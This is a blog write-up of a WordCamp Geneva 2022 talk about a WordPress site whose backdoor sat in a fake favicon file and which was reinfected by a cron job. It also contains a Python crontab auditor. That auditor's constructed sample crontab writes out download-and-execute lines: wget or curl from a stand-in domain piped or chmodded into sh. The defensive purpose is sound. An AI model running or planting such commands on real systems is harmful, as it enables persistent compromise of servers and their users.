Nestor Angulo de Ugarte: The strange case of malicious Favicons [WCGVA 2022]

Live-blogging notes, may contain errors! WordCamp Geneva 2022

A story about being hacked. Clean-up team (blue team).

A few concepts to get on the same page.

Two types of companies, those who have been hacked, and those who don’t yet know they have been hacked.

Hackers (a curious person who likes to go beyond limits or conventions) vs. cyberterrorists (a computer hacker out to enrich himself in a zero-sum game situation = the bad guy).

How a WP site is infected: there is a vulnerability, somebody discovers it and creates an exploit, then injects code (the final payload; a backdoor is the worst scenario). => spam, bot node, etc.

Targets: users, database, content, infrastructure, bot net, reputation.

Some facts:

  • site hacking is almost never client-oriented (98%)

What measures do we have for infected sites?

  • reactive (incident response), when something bad has already happened — pain mitigation

In this case: incident response. Identifying an attack quickly, minimising effects, containing damage… We’ll see how Nestor discovered what had happened and what he did.

WordPress install in which we can see a few weirdly named folders and a file zzkwjuce.zip. Scenario: spammed site. SEO affected, Google ranking removed 😱, rapid reinfection. Viagra ads on the site. Then you get warnings on the site… not fun.

Facts:

  • no WAF (web application firewall) for this website

=> index.php contains an @include pointing to a weird “favicon” file somewhere in a theme directory. Decoded using “$ php -a” and unphp: it’s base64-encoded code (base64decode.org). Runtime semaphore.

Actually the real backdoor was in the comments of the PHP code.

ctrlq.org/beautifier can be useful to make things readable. Sitecheck.sucuri.net (slide with various useful tools).

webpagetest

The favicon was in fact a backdoor connecting to a remote server => turning the website into a bot node. 0-day ability. Different options included (spam, for example), tracking of infected sites, a botnet dashboard…

Main question: how does reinfection happen? Via a cron job in a user directory: wget fetches a file from a malicious domain, it is made executable, the sh script runs, and there we go.
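As an added example (not code from the talk), a Python audit of crontab text for the download-and-execute chain just described: a wget/curl fetch from a remote URL combined with chmod +x, a direct `sh` run, or a pipe into a shell. The sample crontab, the user, the domain and the paths are constructed for illustration.

```python
"""Added example: flag crontab entries that fetch a remote file and execute it.
The sample crontab below is constructed; domain and paths are invented."""
import re

DOWNLOADER_RE = re.compile(r"\b(?:wget|curl)\b[^;&|]*?(https?://[^\s'\"]+)")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:sh|bash)\b")
CHMOD_EXEC_RE = re.compile(r"\bchmod\s+(?:[ugoa]*\+\w*x|[0-7]{3,4})")
# 'sh <path>' / 'bash <path>'; the lookbehind keeps 'x.sh' (a file name) from matching.
SHELL_EXEC_RE = re.compile(r"(?<![\w.])(?:sh|bash)\s+[^\s&|;]+")
TMP_PATH_RE = re.compile(r"(?:^|[\s=])(?:/tmp|/dev/shm|/var/tmp)/")


def split_cron_line(line):
    """Return (schedule, command), or None for blanks, comments and VAR=value lines."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
        return None
    if line.startswith("@"):                      # @reboot, @daily, ...
        parts = line.split(None, 1)
        return (parts[0], parts[1] if len(parts) > 1 else "")
    parts = line.split(None, 5)                   # five schedule fields + command
    if len(parts) < 6:
        return None
    return (" ".join(parts[:5]), parts[5])


def classify(command):
    """Return the set of indicator tags found in one cron command."""
    tags = set()
    if DOWNLOADER_RE.search(command):
        tags.add("remote-fetch")
    if PIPE_TO_SHELL_RE.search(command):
        tags.add("pipe-to-shell")
    if CHMOD_EXEC_RE.search(command):
        tags.add("chmod-exec")
    if SHELL_EXEC_RE.search(command):
        tags.add("shell-exec")
    if TMP_PATH_RE.search(command):
        tags.add("tmp-path")
    return tags


def audit_crontab(text):
    """Return findings for entries that fetch something remote AND execute it."""
    findings = []
    for line in text.splitlines():
        parsed = split_cron_line(line)
        if not parsed:
            continue
        schedule, command = parsed
        tags = classify(command)
        if "remote-fetch" in tags and tags & {"pipe-to-shell", "shell-exec", "chmod-exec"}:
            findings.append({
                "schedule": schedule,
                "command": command,
                "tags": sorted(tags),
                "urls": DOWNLOADER_RE.findall(command),   # what to block / look up
            })
    return findings


# --- constructed sample: a web user's crontab after the reinfection job was planted ---
SAMPLE_CRONTAB = """\
# constructed crontab for user 'www-data'; domain and paths are invented
MAILTO=""
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * wget -q -O /tmp/.x http://update-cdn.example/x.sh && chmod +x /tmp/.x && sh /tmp/.x
@reboot curl -s http://update-cdn.example/x.sh | sh
"""

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f["schedule"], f["tags"], f["urls"])
```

To use it on a real host, feed it the output of `crontab -l -u <user>` for every account in /etc/passwd (the reinfection job in the talk lived in a user's crontab, not in /etc/crontab), plus the files under /etc/cron.d and the cron.* directories; the URLs it returns are the domains to block at the edge while the box is cleaned.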

Final advice: install proactive measures!

  • reduce admins, plugins, and themes (least privilege rule)

Invest in hosting AND security.

WAF: can be external or internal. Wordfence has a WAF. It analyses traffic. An internal one can use up resources. With an external one, the traffic has to pass through it. Sounds like the Star Trek transporter decontamination.

Originally published at Climb to the Stars.

Stephanie Booth